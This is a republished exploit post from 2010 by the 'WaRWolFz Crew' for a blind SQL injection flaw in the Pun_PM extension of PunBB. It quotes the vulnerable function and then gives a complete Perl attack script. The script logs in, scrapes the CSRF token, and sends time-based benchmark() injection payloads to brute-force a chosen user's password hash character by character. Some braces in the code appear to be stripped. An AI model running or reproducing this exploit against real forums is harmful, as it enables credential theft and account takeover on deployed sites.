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PunBB <= 1.3.4 and Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit
来源:dante90wwz.altervista.org 作者:Dante90 发布时间:2010-07-28  

# [0-Day] PunBB <= 1.3.* Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit
# Author/s: Dante90, WaRWolFz Crew
# Created: 2009.07.30 after 0 days the bug was discovered.
# Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, Shades Master, The:Paradox, V1R5, yeat
# Greetings To: _ nEmO _, XaDoS, Necrofiend, Lutor, vagabondo, hacku, yawn, The_Exploited, Shotokan-The Hacker, _mRkZ_,
#               Chuzz, init, plucky, SaRtE, Lupo
# Thanks For Testing: BlAcK HaT, l3d
# Web Site: www.warwolfz.org
# My Wagend (Dante90): dante90wwz.altervista.org
# Unit-X Project: www.unitx.net
# ----
# Why I've decided to publish this?
# Because in "Package: Pun_PM <= v1.2.9" the bug was fixed.
# ----
# ./PunBB v1.3.*/extensions/pun_pm/functions.php
# LINES: 504 -> 526
# function pun_pm_edit_message()
# {
#  global $forum_db, $forum_user, $lang_pun_pm;
#  $errors = array();
#  // Verify input data
#  $query = array(
#   'SELECT' => 'm.id as id, m.sender_id as sender_id, m.status as status, u.username as username, m.subject as subject, m.body as body',
#   'FROM'  => 'pun_pm_messages m',
#   'JOINS'  => array(
#    array(
#     'LEFT JOIN'  => 'users AS u',
#     'ON'   => '(u.id = m.receiver_id)'
#    ),
#   ),
#   'WHERE'  => 'm.id = '.$forum_db->escape($_GET['message_id']).' AND m.sender_id = '.$forum_user['id'].' AND m.deleted_by_sender = 0'
#  );
#  ($hook = get_hook('pun_pm_fn_edit_message_pre_validate_query')) ? eval($hook) : null;
#  $result = $forum_db->query_build($query) or error(__FILE__, __LINE__);
# ----
# GET'
# Error - PunBB
# An error was encountered
# The error occurred on line 525 in ./WaRWolFz/extensions/pun_pm/functions.php
# Database reported: Errore di sintassi nella query SQL vicino a '\ AND m.sender_id = 2 AND m.deleted_by_sender = 0' linea 1 (Errno: 1064).

use strict;
use warnings;

use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use Time::HiRes;
use IO::Socket;

my ($UserName,$PassWord,$ID) = @ARGV;
if (@ARGV < 3) {

my $Message = "";
my $Hash = "";
my ($Time,$Time_Start,$Time_End,$Response);
my ($Start,$End);
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
my $Method = HTTP::Request->new(GET => $Host);
my $Cookies = new HTTP::Cookies;
my $HTTP = new LWP::UserAgent(
   agent => 'Mozilla/5.0',
   max_redirect => 0,
   cookie_jar => $Cookies,
  ) or die $!;
my $Referrer = "http://www.warwolfz.org/";
my $DefaultTime = request($Referrer);

sub request {
 $Referrer = $_[0];
 $Start = Time::HiRes::time();
 $Response = $HTTP->request($Method);
 $Response->is_success() or die "$Host : ", $Response->message,"\n";
 $End = Time::HiRes::time();
 $Time = $End - $Start;
 return $Time;

sub Blind_SQL_Jnjection {
 my ($dec,$hex) = @_;
 return "./misc.php?section=pun_pm&pmpage=write&message_id=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${ID})--";

sub Clear() {
 my $launch = $^O eq 'MSWin32' ? 'cls' : 'clear';
 return system($launch);

sub Login() {
 if ($ARGV[4] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) {
  $Cookies->proxy(['http', 'ftp'], 'http://'.$ARGV[4]) or die $!;
 my $Get = $HTTP->get($Host.'login.php');
 my $csrf_token = "";
 if ($Get->content =~ /type="hidden" name="csrf_token" value="([a-f0-9]{1,40})/i) { #ByPassing csrf_token hidden input
  $csrf_token = $1;
 my $Login = $HTTP->post($Host.'login.php',
     form_sent  => '1',
     redirect_url => $Host.'login.php',
     csrf_token  => $csrf_token,
     req_username => $UserName,
     req_password => $PassWord,
     save_pass  => '1',
     login => 'Login',
    ]) || die $!;

 if ($Login->content =~ /Verrai trasferito automaticamente ad una nuova pagina in 1 secondo/i) { #English Language: You should automatically be forwarded to a new page in 1 second.
  return 1;
 } else {
  return 0;

sub usage {
  print " \n [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n";
  print " ------------------------------------------------------ \n";
  print " * USAGE:                                             *\n";
  print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
  print " * perl name_exploit.pl [username] [password] [id]    *\n";
  print " * [proxy] is optional (ex:         *\n";
  print " ------------------------------------------------------ \n";
  print " *         Powered By Dante90, WaRWolFz Crew          *\n";
  print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
  print " ------------------------------------------------------ \n";

sub refresh {
  print " \n [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n";
  print " ------------------------------------------------------ \n";
  print " * USAGE:                                             *\n";
  print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
  print " * perl name_exploit.pl [username] [password] [id]    *\n";
  print " * [proxy] is optional (ex:         *\n";
  print " ------------------------------------------------------ \n";
  print " *         Powered By Dante90, WaRWolFz Crew          *\n";
  print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
  print " ------------------------------------------------------ \n";
 print $_[0] ."\n";
 print " * Victime Site: " . $_[1] . "\n";
 print " * Default Time: " . $_[2] . " seconds\n";
 print " * BruteForcing Hash: " . chr($chars[$_[3]]) . "\n";
 print " * BruteForcing N Char Hash: " . $_[6] . "\n";
 print " * SQL Time: " . $_[5] . " seconds\n";
 print " * Hash: " . $_[4] . "\n";

sub Main(){
 if (Login() == 1) {
  $Message = " * Logged in as: ".$UserName;
 } elsif (Login() == 0) {
  $Message = " * Login Failed.";
  refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1");
  print " * Exploit Failed                                     *\n";
  print " ------------------------------------------------------ \n";
 for (my $I=1; $I<=40; $I++) { #N Hash characters
  for (my $J=0; $J<=15; $J++) { #0 -> F
   $Time_Start = time();
   my $Get1 = $HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
   $Time_End = time();
   $Time = request($Referrer);
   refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
   if ($Time_End - $Time_Start > 6) {
    $Time = request($Referrer);
    refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
    if ($Time_End - $Time_Start > 6) {
     $Hash .= chr($chars[$J]);
     $Time = request($Referrer);
     refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
  if ($I == 1 && length $Hash < 1 && !$Hash) {
   print " * Exploit Failed                                     *\n";
   print " ------------------------------------------------------ \n";
  if ($I == 40) {
   print " * Exploit Successfully Executed                      *\n";
   print " ------------------------------------------------------\n ";


#WaRWolFz Crew

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